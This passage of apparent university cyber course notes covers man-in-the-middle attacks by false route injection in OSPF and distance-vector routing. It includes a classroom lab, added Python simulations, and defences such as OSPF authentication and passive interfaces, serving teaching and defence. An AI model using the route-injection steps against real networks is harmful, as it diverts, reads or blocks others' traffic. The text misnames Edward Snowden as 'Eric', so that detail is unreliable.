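                for dest, adv in adverts[n].items():
                    if dest == r:
                        continue
                    total = link_cost + adv
                    if dest not in table or total < table[dest][0]:
                        table[dest] = (total, n)
            new_tables[r] = table
            changed = changed or table != tables[r]
        tables = new_tables
        if not changed:
            break
    return tables


def route(tables, src, dst):
    """Follow next hops from src to dst and return the path actually taken."""
    path, cur = [src], src
    while cur != dst:
        cur = tables[cur][dst][1]
        path.append(cur)
    return path


if __name__ == "__main__":
    honest = run_distance_vector(LINKS)
    lying = run_distance_vector(LINKS, lies={("C", "A"): 1})
    print("honest  D->A:", honest["D"]["A"], route(honest, "D", "A"))   # (6, 'B') ['D', 'B', 'A']
    print("C lies  D->A:", lying["D"]["A"], route(lying, "D", "A"))     # (3, 'C') ['D', 'C', 'A']
    print("C lies  A->D:", lying["A"]["D"], route(lying, "A", "D"))     # (6, 'B') unchanged
```

Router D's traffic to A is pulled through C because 2 + 1 beats 2 + 4, while A's own path to D is untouched: A measured its link to C itself and is not taking C's word for it, which is the asymmetry the text points out next.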
Even with this manipulation, if Router D wanted to send packets to Router A, won't the information be delivered just as before? (Note that only Router D is fooled by Router C's lie. Router A's table is not affected by Router C's lie and it will still route to Router D via Router B with a total cost of 6. This is because Router A knows its distance to Router C.)

[Cartoon: "Hi, remember me? I'm Ciana." "No."]

Now that Router C is in the middle of Router D and Router A, it can:
1. Observe the traffic moving between these devices.
2. Change the information moving between these devices.
3. Stop the traffic from moving between these devices.

Why is this an issue? Recall from SI110, there are five pillars of information assurance we want to preserve when offering services through routers and other information systems.[26]
1. Confidentiality – protection of information from disclosure to unauthorized individuals, systems, or entities.
2. Integrity – protection of information, systems, and services from unauthorized modification or destruction.
3. Availability – timely, reliable access to data and information services by authorized users.
4. Non-repudiation – the ability to correlate, with high certainty, a recorded action with its originating individual or entity.
5. Authentication – the ability to verify the identity of an individual or entity.

[Cartoon: "Grr... Don't remember me, huh? You'd better for the test!"]

Practice Problem 16.2

What primary pillar of information assurance is violated in each thing Router C can do once it is in the middle of Router D and Router A?
(a) The ability to observe traffic violates:
(b) The ability to change traffic violates:
(c) The ability to stop traffic violates:

2. The Man-In-The-Middle (MITM) Attack

This type of problem is called the Man-In-The-Middle attack. We have seen this once already in Chapter 14.
Specifically, the technique used to conduct the MITM attack in Chapter 14 was called ARP-Spoofing, because redirecting another computer's traffic on a single network required your computer to tell a specific lie about the association between its MAC address and IP address. Much like a nasty rumor in the Brigade, that lie had to spread around for it to be effective. Similarly, you included your own MAC address with the target's IP address through multiple unsolicited ARP-Replies to convince everyone on your local network that your machine was the target host. Finally, everyone on your local network had to believe your lie for you to begin receiving packets destined for the target machine.

Do you think it is possible for something like this to happen on a bigger scale? That is, instead of a Man-In-The-Middle attack on one network as with ARP-spoofing, can this happen between multiple networks?

[26] See http://www.usna.edu/CS/si110/lec/l00/lec.html to review these topics and definitions.

Yes it could happen, and things similar to this have already happened, but to understand how requires a bit more understanding of how networks interconnect. However, just as before with ARP-Spoofing, there are four critical steps that must occur for an attacker to make this possible.
1. Take control of a machine on the network and manipulate its operation.
2. Force the machine to tell the "right" kind of lie.
3. Force the machine to spread the lie around.
4. Force other machines to believe the lie.

3. Wait a Minute...

"Boring! Okay, so I may not remember much from SI110, but the one thing I do remember is that encryption solves all of our problems. If someone is snooping around and reading my packets, then I will just encrypt them and ruin their ability to influence my communication. Done, may I go now?"

As Mr. Eric Snowden recently revealed, that is exactly what the National Security Agency (NSA) and others would want you to think.[27]
While it is true that encryption may make eavesdropping harder for the man in the middle, it is not insurmountable. In reality, as the New York Times explains, some of the core encryption protocols of the Internet are already broken. For those that are not, the NSA allegedly spends upwards of $250 million a year on US and foreign industries to covertly influence commercial product designs to make them exploitable. To leverage this advantage, the NSA pays a significant amount of money to become the man in the middle so they can read any Internet traffic, encrypted or not. One example from WIRED magazine talks about a $652 million NSA project to help take control of routers and networks to monitor foreign communications.[28]

Hopefully, it is clear that understanding how a MITM attack can take place across multiple networks is very important to Cyber Warfare as a whole.

[Cartoon: "Yes, sir! Please give me more details so that I can understand this critically important material."]

II. A Closer Look at How Networks Interconnect

1. An Important Example

Let's say there is an important website that all midshipmen need to access in order to prepare for EC310 each day. That website is located at IP address 4.4.5.155 on the network 4.4.5.0/24. The midshipmen who need access to it are located on network 192.168.65.0/24, and have one of the 253 available host IP addresses assigned to their laptops.

[27] See http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?pagewanted=1&_r=2&
[28] See http://www.wired.com/threatlevel/2013/09/nsa-router-hacking/

Practice Problem 16.3

Construct the routing table for Router A.

Now, let's pretend there is an evil instructor (because aren't all instructors evil?) located on the 5.5.5.0/25 network that wants to prevent students from reaching the EC310 website at 4.4.5.155. What would that instructor need to do in order to make the students' traffic go to some place they did not intend?
a) First, the instructor will need to: take control of a machine on the network and manipulate its operation.

Being an instructor, ITSD has graciously allowed him (or her) privileged access to his office computer for 'academic research', but nowhere else. ITSD has restricted the instructor's privileged access in order to prevent him from making any changes that could affect other computers on the network. Therefore, the instructor will need to manipulate his computer in such a way where it can alter the flow of traffic across the networks and deny midshipmen access to the course website. To accomplish this, he decides to turn his computer into a router using a special software tool called Loki.[29] This tool 'speaks' the Open Shortest Path First (OSPF) protocol, which will enable the injection of false routing information into the networks.

b) Second, the instructor will need to: force his router to tell the "right" kind of lie.

[29] Loki is a Python based framework implementing many packet generation and attack modules for Layer 3 protocols. It was developed by ERNW, an IT security service provider, in 2010. See https://www.ernw.de/research/loki.html for more details.

But what is the "right" kind of lie to tell? Well, that depends on the effect the instructor wants to have on the networks. For example, if the instructor wanted to cause a panic across the entire Brigade, he or she might say that "buffalo chicken sandwiches will no longer be offered in King Hall." However, if he only wanted to terrorize the students in his EC310 section, the instructor could say "you will have a quiz tomorrow over Lessons 1 through 15 worth 99.2003% of your final grade."

The instructor's goal is to stop the students' traffic from reaching the EC310 web server located at 4.4.5.155. To do this the instructor would like to direct the students' traffic to a different location where their web requests will go unanswered.
Knowing that routers transmit information to the destination that matches the longest network prefix in their routing table, the instructor decides to create a false network from his router with a more specific network ID that will direct the students' traffic away.

Practice Problem 16.4

What is the first and last IP address of the 4.4.5.0/24 network where the webserver is located?
(a) First Address:
(b) Last Address:

Looking at Router A's table, what network ID and mask should the evil instructor choose? Other options?

What is the first and last address of the false network the evil instructor will advertise?
(a) First Address:
(b) Last Address:

Does the IP address of the webserver fall within the IP address block that the evil instructor will advertise?

c) Third, the instructor will need to: force his router to spread the lie around.

Recall from Lesson 15, under the Internet's Open Shortest Path First (OSPF) protocol, routers communicate with one another using Link State Packets (LSPs). These packets are distributed to all routers through "controlled flooding" to allow each router to build a full and complete picture of the topology of the entire network. However, before routers swap LSPs with each other,they must become neighbors first and agree on a basic set of operating parameters. Therefore, in order for the evil instructor to spread his lie about the fake network he must become neighbors first with a router on his network. Then he can send his malicious LSP advertising the false network he is connected to.

d) Fourth, the instructor will need to: force the other routers to believe the lie.

Fortunately for the attacker in OSPF this is relatively easy because controlled flooding is already built into the protocol. As previously mentioned, LSPs are forwarded to all routers through controlled flooding to ensure all routers have a complete picture of the network's topology.
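The longest-prefix rule that step b) relies on, and the check a network administrator can run against a router's table to notice a learned route that is more specific than the one they configured for a protected network. This is an added example, not code from the EC310 notes; the addresses are constructed (a protected server at 10.20.7.9 inside 10.20.0.0/16 and an unexpected 10.20.7.0/24) rather than the chapter's, so Practice Problem 16.4 is left to you.

```python
# Added example (not from the EC310 notes): longest-prefix-match forwarding
# and a check for learned routes that are more specific than the configured
# one. All prefixes and next-hop names below are constructed sample data.
import ipaddress


def address_range(prefix):
    """First and last address of a prefix: '10.20.7.0/24' -> ('10.20.7.0', '10.20.7.255')."""
    net = ipaddress.ip_network(prefix, strict=False)
    return str(net.network_address), str(net.broadcast_address)


def longest_prefix_match(routing_table, destination):
    """routing_table: {prefix: next_hop}. Return (prefix, next_hop) of the
    most specific route that contains `destination`, or None if nothing matches."""
    dest = ipaddress.ip_address(destination)
    best = None
    for prefix, next_hop in routing_table.items():
        net = ipaddress.ip_network(prefix, strict=False)
        if dest in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, next_hop)
    return (str(best[0]), best[1]) if best else None


def more_specific_routes(routing_table, expected):
    """Flag learned routes that lie inside an expected prefix, are longer than
    it, and point to a different next hop than the administrator configured.
    Returns a list of (suspect_prefix, its_next_hop, expected_prefix)."""
    alerts = []
    for exp_prefix, exp_hop in expected.items():
        exp_net = ipaddress.ip_network(exp_prefix, strict=False)
        for prefix, next_hop in routing_table.items():
            net = ipaddress.ip_network(prefix, strict=False)
            if net != exp_net and net.subnet_of(exp_net) and next_hop != exp_hop:
                alerts.append((prefix, next_hop, exp_prefix))
    return alerts


# Constructed tables: the administrator expects 10.20.0.0/16 to be reached via router-B.
EXPECTED = {"10.20.0.0/16": "router-B"}
HONEST_TABLE = {"0.0.0.0/0": "router-A", "10.20.0.0/16": "router-B"}
HIJACKED_TABLE = dict(HONEST_TABLE, **{"10.20.7.0/24": "rogue-router"})

if __name__ == "__main__":
    print(address_range("10.20.0.0/16"))                        # ('10.20.0.0', '10.20.255.255')
    print(longest_prefix_match(HONEST_TABLE, "10.20.7.9"))      # ('10.20.0.0/16', 'router-B')
    print(longest_prefix_match(HIJACKED_TABLE, "10.20.7.9"))    # ('10.20.7.0/24', 'rogue-router')
    print(more_specific_routes(HIJACKED_TABLE, EXPECTED))       # [('10.20.7.0/24', 'rogue-router', '10.20.0.0/16')]
```

The /16 is still in the table and still correct; it simply loses every lookup for addresses that the /24 also covers, which is why a route monitor should compare what was learned against what was configured rather than only checking that the expected prefix is present.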
Thus, once Router B learns about the new false network from the evil instructor, Router B will turn around and tell Routers A and C.

Practice Problem 16.5

What will Router A's routing table look like, once it hears the lie about the fake network from Router B?

Thus, whenever a student sends a packet destined for the webserver at 4.4.5.155, where will Router A forward their packet?

Will the EC310 students ever be able to reach the course web page?

Do you think it is possible that something like this could ever happen on the Internet? Unlike the previous example, the Internet consists of hundreds of thousands of networks stretched across the entire globe. Could it be possible for someone to change the way traffic flows across such a big and complex distributed system?

Yes it could happen, and similar things like this have already happened, but to understand how requires a bit more understanding of the Internet first. Specifically, we need to understand the fundamental protocol of the Internet, the Border Gateway Protocol (BGP). That is, before we can become a locksmith (of the Internet), we need to know a bit more about how the lock (the Internet) operates.

2. Protection Against False Route Injection

How can we stop such malicious behavior? Recall that by default routers trust the information other routers are sending, but this does not have to be the case. The Open Shortest Path First protocol has two authentication mechanisms built in to protect against false route injection. The first is a simple plaintext password added to all LSPs so each router can authenticate the information it is receiving. If a router sends an LSP without the appropriate password, then the LSP is rejected. The second method is an MD5 hash of the OSPF packet and a shared secret key. Recall from SI110 that hashing is a 'one-way' technique that produces the same message digest (i.e., fixed-size output) given the same input string.
Additionally, while it is easy to hash the input string, it is very hard to identify the input string given only the message digest (remember the Rubik's cube?). In OSPF, routers can send the hash of the OSPF packet and a shared secret key along with their LSP to authenticate themselves to other routers. Of course, all routers must know the shared secret key in advance. This may seem trivial at first, but consider the number of routers at a place like Google or Amazon Web Services, where there are literally thousands of routers.

Lastly, separate from these two authentication mechanisms, most implementations of OSPF allow for the creation of passive interfaces. Just as you tune out a roommate who is getting on your nerves by putting your headphones on, routers can do the same thing. Once a network administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that interface. However, this requires network administrators to make smart decisions when setting up the topology of their networks and configuring their routers.

Practice Problem 16.6
Briefly describe two technical solutions to protect against false route injection and identify who is responsible for implementing them.
Solution #1:
Solution #2:

OPTIONAL: Interestingly, of the three actions an attacker can take during a MITM attack, what do you think an attacker would most likely want to do? Observe, change, or stop your traffic? It seems frightening to have our traffic stopped by someone else or changed as it is moving to its destination, but recent cyber activity has indicated that an attacker is more likely to want to observe your traffic in the end.
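The longest-prefix behavior the lesson relies on and the two OSPF protections against it, worked through in Python as an added example (not code from the EC310 notes; it also covers the "Fix #1" discussion in Security Exercise 16). The webserver at 4.4.5.155 on 4.4.5.0/24 is the lesson's; Router A's next hops and interfaces, the more specific 4.4.5.128/25 the evil router advertises, and the key 123456 are constructed, and the authentication check is a simplified model of OSPF's plaintext and MD5 modes rather than a wire-accurate OSPF packet.

```python
"""Longest-prefix forwarding and LSP authentication, modelled on Lesson 16 and
Security Exercise 16 (Fix #1). Added example, not code from the EC310 notes.
From the lesson: the webserver is 4.4.5.155 on 4.4.5.0/24 behind Router A.
Constructed for this illustration: Router A's next hops and interfaces, the
4.4.5.128/25 the evil router advertises, its next hop, and the shared key.
The authentication model simplifies OSPF's two mechanisms; it is not a
wire-accurate OSPF packet."""
import hashlib
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Route:
    prefix: ipaddress.IPv4Network
    next_hop: str
    interface: str


@dataclass
class LSP:
    """A Link State Packet reduced to what the model needs."""
    network: str                    # network the sender claims to reach
    advertiser: str                 # router ID of the sender
    password: Optional[str] = None  # plaintext-password mode
    digest: Optional[bytes] = None  # MD5 mode

    def body(self) -> bytes:
        return f"{self.advertiser}|{self.network}".encode()

    def on_the_wire(self) -> bytes:
        """Bytes anyone running Wireshark on the link would capture."""
        tail = self.password.encode() if self.password else (self.digest or b"")
        return self.body() + b"|" + tail


def lookup(table: List[Route], dst: str) -> Optional[Route]:
    """Routers forward on the entry with the longest matching network prefix."""
    addr = ipaddress.ip_address(dst)
    matches = [r for r in table if addr in r.prefix]
    return max(matches, key=lambda r: r.prefix.prefixlen, default=None)


def md5_digest(lsp: LSP, key: bytes) -> bytes:
    """Keyed digest: MD5 over the packet with the shared secret appended.
    The key itself never appears on the wire; only the digest does."""
    return hashlib.md5(lsp.body() + key).digest()


def sign(lsp: LSP, key: bytes) -> LSP:
    lsp.digest = md5_digest(lsp, key)
    return lsp


def accept_lsp(lsp: LSP, mode: str, secret: bytes) -> bool:
    """Decide whether to install what this LSP advertises.
    'none' is the default trust between routers; 'plaintext' and 'md5'
    are OSPF's two authentication mechanisms."""
    if mode == "none":
        return True
    if mode == "plaintext":
        return lsp.password == secret.decode()
    if mode == "md5":
        return lsp.digest == md5_digest(lsp, secret)
    raise ValueError(f"unknown authentication mode {mode!r}")


def router_a_table() -> List[Route]:
    """Router A before any lie: a default route and the webserver's LAN."""
    return [
        Route(ipaddress.ip_network("0.0.0.0/0"), "7.7.7.1", "eth0"),
        Route(ipaddress.ip_network("4.4.5.0/24"), "connected", "eth1"),
    ]


def inject(mode: str, secret: bytes = b"123456") -> List[Route]:
    """The evil router advertises 4.4.5.128/25: longer than /24, still
    containing 4.4.5.155, and carrying no authentication data. Returns
    Router A's table after it processes that LSP under the given mode."""
    table = router_a_table()
    lie = LSP(network="4.4.5.128/25", advertiser="evil")
    if accept_lsp(lie, mode, secret):
        table.append(Route(ipaddress.ip_network(lie.network), "1.2.3.66", "eth2"))
    return table


def webserver_next_hop(mode: str) -> str:
    """Where Router A sends a student's packet for 4.4.5.155 under each mode."""
    return lookup(inject(mode), "4.4.5.155").next_hop


def more_specific_alerts(table: List[Route], critical: str) -> List[str]:
    """Defender's check: prefixes that cover a critical address but are
    longer than the shortest non-default prefix for it. A new entry here
    has exactly the shape of a false route injection."""
    addr = ipaddress.ip_address(critical)
    covering = sorted(
        (r.prefix for r in table if addr in r.prefix and r.prefix.prefixlen > 0),
        key=lambda p: p.prefixlen)
    return [str(p) for p in covering[1:]]


if __name__ == "__main__":
    for mode in ("none", "plaintext", "md5"):
        print(f"auth={mode:9s} 4.4.5.155 forwarded via {webserver_next_hop(mode)}")
```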
Consider the following excerpt from the report by Kevin Mandia's firm Mandiant on Advanced Persistent Threat 1 (APT1), a Chinese cyber warfare unit:[30]

"Our evidence indicates that APT1 has been stealing hundreds of terabytes of data from at least 141 organizations across a diverse set of industries beginning as early as 2006. Remarkably, we have witnessed APT1 target dozens of organizations simultaneously. Once the group establishes access to a victim's network, they continue to access it periodically over several months or years to steal large volumes of valuable intellectual property, including technology blueprints, proprietary manufacturing processes, test results, business plans, pricing documents, partnership agreements, emails and contact lists from victim organizations' leadership. We believe that the extensive activity we have directly observed represents only a small fraction of the cyber espionage that APT1 has committed. Once APT1 has compromised a network, they repeatedly monitor and steal proprietary data and communications from the victim for months or even years. For [141] organizations... we found that APT1 maintained access to the victim's network for an average of 356 days. The longest time period APT1 maintained access to a victim's network was at least 1,764 days, or four years and ten months. APT1 was not continuously active on a daily basis during this time period; however, in the vast majority of cases we observed, APT1 continued to commit data theft as long as they had access to the network."

Notice the chosen behavior of this Chinese cyber warfare unit. Rather than shut down the networks of the various companies they invaded or change the information located there, they simply observed the traffic and stole copies for themselves. It would seem their primary desire was not to do damage but to gain information.

[30] See http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf for the full report on APT1, originally published in 2013.

Problems
1. What is the underlying assumption between routers in the routing algorithms they use which makes it possible to conduct a Man-In-The-Middle (MITM) attack?
2. What three things can an attacker do to your network traffic in a Man-In-The-Middle (MITM) attack, and what pillar of Information Assurance is affected by each?
3. Sketch the routing table for Router C for the network shown on page 420.
4. An attacker is located on the 5.6.7.0/24 network and wants to prevent midshipmen from reaching a website at 8.8.8.26. He turns his computer into a router using Loki to advertise a false network to Router C.
(a) Construct the routing table for Router C. Use the template shown below:
(b) Looking at Router C's routing table, what network address and mask should the attacker choose? In answering this question, complete the table below.
(c) Complete the routing table entry below with your answer from (b) and draw a line into Router C's routing table showing where the attacker's false network would go.
(d) What is the first and last IP address of the false network you chose for the evil instructor?
(e) Does the IP address of the webserver fall within your choice for the evil instructor's false network?
(f) Given your answer to part (e), whenever a midshipman sends a packet destined for the webserver at 8.8.8.26, where will Router C forward the packet? Will the midshipman ever be able to reach the important website?
(g) List and briefly describe two technical solutions that could be implemented on Router C to prevent the evil instructor from injecting false routing information.
(h) Who is responsible for implementing these security measures in a network?
5. What does a router assume by default when another router sends it information about the state of its links or the distance between it and other routers?
6. An attacker is located on the 3.4.5.0/25 network and wants to prevent midshipmen from reaching a website at 8.9.7.96. The network is depicted below.
He turns his computer into a router using Loki and advertises a false network of 8.9.7.80/28 to Router A.

[Network diagram for Problem 6; the drawing did not survive extraction. Labels recoverable from it: 8.9.7.96; RA, eth1, 8.9.7.65; RA, eth0; RB, eth0; 8.9.7.64/26; 1.2.3.1; 1.2.3.0/24; 1.2.3.10; 3.4.5.1; RB, eth1; 3.4.5.0/25; EVL, eth0, 3.4.5.32; 8.9.7.80/28; 7.7.7.1; Internet; RA, eth2, 8.9.7.66.]

(a) Fill in the blanks in the table below to complete Router A's routing table.
(b) In the line provided below Router A's routing table, fill in the false route the attacker would inject.
(c) Draw a line from the false route pointing to the location in which it would be injected into Router A's routing table.
(d) Will the attacker be successful in redirecting the midshipmen's traffic? Justify your answer.
(e) List and briefly describe two technical solutions that could be implemented on Router A to prevent the attacker from injecting false routing information.
(f) Who is responsible for configuring these security measures on Router A: the Network User, the Network Administrator, the Network Hardware Manufacturer or the Network Programmer?

Security Exercise 16
Introduction
It is interesting to hear the theory behind a Man-In-The-Middle attack, but it is better to experience it yourself.

1. Set-Up
Equipment required:
- Your issued laptop.
  o Turn off the wireless adapter.
  o Connect the blue Ethernet cable at your desk to your issued laptop.
- Your completed network diagram from SX#15 and a printed copy of this security exercise.
  o Separate the answer sheet and have it ready to fill in.
- VMware Workstation
  o Power on your Cyber2 VM, then click VM and Settings.
  o Select Network Adapter and ensure that Connected, Connected at power on, Bridged: Connected directly to the physical network, and Replicate physical network connection state are selected or checked, then click OK.
  o Open a terminal in your Cyber2 VM and execute the command sudo dhclient. Once it finishes, execute the command ifconfig. Your screen should look similar to Figure 1 on page 390.
Interface eth1 should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 100 and 199. If not, notify your instructor or lab technician.

Figure 1 – ifconfig executed after initial lab setup.

Part 2: The Evil Instructor
1. The Attack
The evil instructor wants to deny you access to www.usna.edu. Just as you discovered in SX#15, he has found the IP address for the website and understands that routers work using the longest mask matching principle. He also understands the default assumption between routers in the routing algorithms they use to construct their routing tables.

Let's start by verifying the correct website.
- Use traceroute -n to identify the route to www.usna.edu.
- Access www.usna.edu using Firefox to verify the name of the site administrator.

Question 1: What is the assumption the evil instructor understands about routers in the routing algorithms they use?

STOP! Observe Demonstration #1
- When directed, label part m) of your network diagram.
- When directed, use traceroute to identify the new route to www.usna.edu.
- When directed, access www.usna.edu using Firefox. If already open, refresh your browser using either method below.
  Ctrl + Shift + R or Shift + (Reload button)

Question 2: After the evil instructor injected false routing information into the network, where did your traffic destined for www.usna.edu go? Was the website still available?

Question 3: What did your evil instructor attack in order to deny you access to www.usna.edu? Pick one.
a) your virtual machine
b) the Webserver
c) a script running on the webpage
d) the network

Question 4: What pillar of information assurance did this affect?

STOP! Observe Demonstration #2
- When directed, refresh www.usna.edu using either method below.
  Ctrl + Shift + R or Shift + (Reload button)
- When directed, use traceroute to identify the new route to www.usna.edu.

Question 5: Who maintains the website at www.usna.edu?
It may not seem very significant to have your homework interrupted or altered by a Man-In-The-Middle attack, but what if the website you were visiting were more important? For example, what if you needed to check on the status of your second class loan with your bank?

STOP! Observe Demonstration #3
- When directed, refresh www.usna.edu using either method below.
  Ctrl + Shift + R or Shift + (Reload button)

Question 6: What fake website did your evil instructor misguide you to, and what pillar of information assurance did this affect?

Recall from SI110 that the X.509 certificate system provides a mechanism to establish a secure connection with a website. It provides assurance of the binding between a website's domain name and its public key. That is, when the lock icon closes in our browser and we establish a secure connection with a website, we know that the public key used to transfer a symmetric encryption key belongs to a particular domain name.

Question 7: If the X.509 certificate system only offers proof that a public key belongs to a specific domain name, whose responsibility is it to verify that a website is authentic?

2. The Fix #1: Easy as 123456
Recall from Lesson #16 that the Open Shortest Path First (OSPF) protocol has two authentication mechanisms built in to protect against the injection of false routing information. The first is a simple plaintext password added to all Link State Packets (LSPs) so each router can authenticate the information it is receiving. However, because the password is included in plaintext with each LSP, anyone observing the LSPs with Wireshark can easily discover the 'secret' password. This is similar to how you discovered the victim's password in SX#14. Much more interesting is the second method for authentication in OSPF, an MD5 hash of the OSPF packet and a shared secret key.
Recall from SI110 that hashing is a 'one-way' encryption technique that produces the same message digest (i.e., encrypted output) given the same input string. Additionally, while it is easy to hash the input string, it is very hard to identify the input string given only the message digest (remember the Rubik's cube?). In OSPF, routers can send the hash of the OSPF packet and a shared secret key along with their LSP to authenticate themselves to other routers. Of course, all routers must know the shared secret key in advance. This may seem trivial at first, but consider the number of routers at a place like Google or Amazon Web Services, where there are literally thousands of routers.

Question 8: We have all been told to change our password regularly to increase security, but do you think it is easy to change the shared secret key in every router at a place like Google or Amazon (or even the Naval Academy)? Do you think there may be an incentive for network administrators to make the shared secret key something easy to remember?

STOP! Observe Demonstration #4
- When directed, refresh www.usna.edu using either method below.
  Ctrl + Shift + R or Shift + (Reload button)

Question 9: What are some important things to consider when choosing a password?

3. The Fix #2: Passive Aggression
Consider the topology of your network diagram from a security perspective.

Question 10: Is there any reason Router B should listen to routing information being sent over interface eth2?

Most implementations of OSPF allow for the creation of passive interfaces. Just as you tune out a roommate who is getting on your nerves by putting your headphones on, routers can do the same thing. Once a network administrator sets up a passive interface on a router, the router will ignore all routing information being sent over that interface. However, this requires network administrators to make smart decisions when setting up the topology of their networks and configuring their routers.

STOP!
Observe Demonstration #5

Question 11: How many OSPF Hello packets did your instructor receive once the passive interface was enabled?

Question 12: As a user, whom do you trust by default for the safe and effective administration of your network? Do you have the ability to control the security of the network on your own?

4. Clean Up
- VMware Workstation
  o In the VMware Workstation menu click VM and Settings.
  o Select Network Adapter and ensure that Connected, Connected at power on, and NAT: Used to share the host's IP address are not selected (unchecked), then click OK.
  o Suspend your Cyber2 VM.
  o Disconnect the blue Ethernet cable.
  o Turn on your wireless adapter.

Security Exercise 16 Answer Sheet
Name:

Router A's Routing Table
Mask   Network Address   Next-Hop Address   Interface
/0     0.0.0.0           Default            eth5
(remaining rows to be filled in)
False Route Injection:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:

Chapter 17: Border Gateway Protocol
Objectives:
(a) Discuss the major concerns with the use of a single protocol for the Internet.
(b) Describe the various autonomous system categories.
(c) Utilize path attributes to determine the path of a packet across ASes.
(d) Demonstrate the ability to state the BGP announcements that would be made given an internet diagram.

I. Internet Structure
Up to this point, all we've looked at is a small set of Local Area Networks (LANs) which have been connected together through a limited number of routers. As an example, consider the network topology discussed in Chapter 16. It was comprised of only a few small networks and a few routers which facilitated access to a single webserver. This group of networks would be easily manageable by one organization, but this network is not representative of the Internet today. Today's Internet comprises thousands of networks managed by a countless number of different people spread across the entire globe.
But how did the Internet become so big, and what did the Internet look like when it first began?

1. The Internet of Old
It used to be that the structure of the Internet was like that of a tree: one central trunk (a.k.a. the backbone) that fed all the other downstream entities. The picture below shows the Internet circa 1990. End users (such as Stanford and UNM in the figure) connected to "service providers" (such as Westnet regional), which in turn connected to a single backbone. Recall from Security Exercise 14 that the single backbone, circa 1990, was funded by the National Science Foundation—hence the name "The NSFNET backbone".

[Figure: the Internet circa 1990. Source: Peterson and Davie, Computer Networks: A Systems Approach, Morgan Kaufmann, 2007]

We also learned in Security Exercise 14 that the Internet evolved over time. Multiple companies offered to provide backbone services, and gradually the original tree-like structure (with a single backbone) was replaced by a multi-backbone structure. Additionally, multiple networks oftentimes decided to connect directly together, avoiding the backbone altogether. The companies providing backbone services also recognized the utility in connecting the backbones together.

2. Today's Internet
[Figure: Representation of Today's Internet Structure]

Today there are several backbones run by different private corporations and governments to provide global connectivity. You may even recognize some of these backbones. They are key communication players like AT&T, Sprint, Level 3 Communications, Verizon, and others. Much of the Internet's traffic is eventually routed through at least one backbone. Thus, a particular backbone can manipulate the traffic that goes through it. Recall from Chapter 11 that we saw several examples of how this power was abused, through error or malicious intent, to observe, change or stop the flow of traffic across the Internet.
Specifically, you learned how YouTube was brought down by the actions of the Pakistan Telecom Authority on February 4th, 2008. But, for now, let's understand a bit more about how these backbones interconnect.

The backbones are interconnected by peering points that allow connectivity between the backbones. These peering points (Internet Exchanges) are voluntary connections between different networks which increase redundancy and capacity. Although competitors, backbone providers desire these peering arrangements just in case one backbone is suddenly asked to deliver more traffic than it is capable of (in which case it can send the excess to a competitor) or in case one backbone is knocked offline completely.

The provider networks use the backbones for global connectivity, and, in turn, the customer networks utilize the services of the provider networks. Any of the three (the backbones, the provider networks, or the customer networks) can provide services (although at different levels) and can be called Internet Service Providers (ISPs).

Note some of the complexities in the figure above. For example, customer networks can connect to two (or more) different provider networks in order to increase redundancy. Provider networks can connect directly to two (or more) backbones, again for redundancy. Additionally, provider networks can connect directly to peering points within an Internet Exchange.

Still, though, the picture of the Internet above is a cartoonish oversimplification. Consider the picture of the Internet shown below, noting the small inset that is expanded.[31]

[Figure: Image of a small grouping of networks within the Internet]

An Aside
The structure of the Internet has as much to do with money and politics as it does with technology. Consider the fact that the backbones are run by companies such as AT&T, Sprint and Verizon. Why them?
These companies had the regulatory right-of-way clearance (i.e., the legal permission) to run long-distance cable across the country, and the finances to support the operation. You may wonder about those peering points—why would a company agree to allow a competitor the option of using its backbone network? Well… consider what the Internet would look like without peering points! We would not have a single Internet—we would have an AT&T Internet, a Sprint Internet, a Verizon Internet, etc. That would cause more problems for everyone. Using peering points allows connectivity between the backbones, preserving the operating idea of a single network. A major peering point is the networking equivalent of one of those Paris traffic circles: a huge amount of traffic, very busy, very high speed, somewhat mind-boggling. The Border Gateway Protocol, which we discuss in this lecture, implements orderly negotiation among the peers, bringing some order to that chaos.

[31] For an alternative view of the Internet, arranged in a spherical shape, see http://www.technologyreview.com/news/408104/mapping-the-internet/ .

3. Inherent Problems with a Single Routing Protocol
As of December 31, 2013, there were 7.2 billion people in the world, of which 2.8 billion were Internet users (source: http://www.internetworldstats.com/stats.htm). All of these users collectively produce a gargantuan amount of network traffic, which traverses many, many networks (with many, many interconnecting routers). With all these users and devices, there is no way that routing on the Internet can be accomplished using a single protocol. There are two major issues that prevent the use of a single global routing algorithm on the Internet:

a. Scalability: Can you imagine the size of the routing tables each router would have to maintain? Routing tables would become—what's the word… behemothic?
These elephantine routing tables would mean that: 1) searching for a destination would be extremely time consuming; and 2) updating such unwieldy tables would create excessive amounts of needless traffic.

b. Administration: Even if we could manage the scalability issue, a larger issue concerning network administration looms before us. We have described two different routing methodologies: link state routing and distance vector routing. Both approaches model the underlying network as a graph, where the routers comprise the nodes of the graph, and an edge is drawn between two routers if the routers are directly connected. Recall that each edge in the graph has a weight associated with it. Both of the routing approaches seek to determine a route from a source (say Router A) to a destination (say Router B) that has a minimum total weight. For example, if the weights on the graph edges represent cost, the algorithms will determine the minimum cost route from A to B. If, on the other hand, the weights represent time delay, then the algorithms will determine the minimum delay route (i.e., the fastest route) from A to B.

You may have already noticed a problem with this approach to routing. Suppose Provider Network X owns and runs a network that comprises a large number of routers (and interconnecting edges). Suppose that Provider Network Y also owns and runs a network that comprises a large number of routers and edges. Suppose the networks for both Provider Network X and Provider Network Y are connected to the global Internet, as shown in the figure on page 396. So far, so good. Suppose, though, that Provider Network X is really ElCheapo Inc, and is only concerned with cost, and so has assigned the edge weights to measure cost. For Provider Network X, which promotes itself as "The cheapest ISP in town", delay is not a concern.
Provider Network Y, on the other hand, is really SpeedyISP Inc, and is only concerned with delay, and so has assigned the edge weights to measure delay. For Provider Network Y, which advertises itself as "The fastest ISP in town", cost is not a concern.

Choosing a single routing algorithm that satisfies both Provider Network X and Provider Network Y will be problematic. If the chosen algorithm minimizes the cost, Provider Network Y might be unhappy since the delays might be intolerable. If the chosen algorithm minimizes the delay, Provider Network X might be unhappy since the costs might be intolerable.

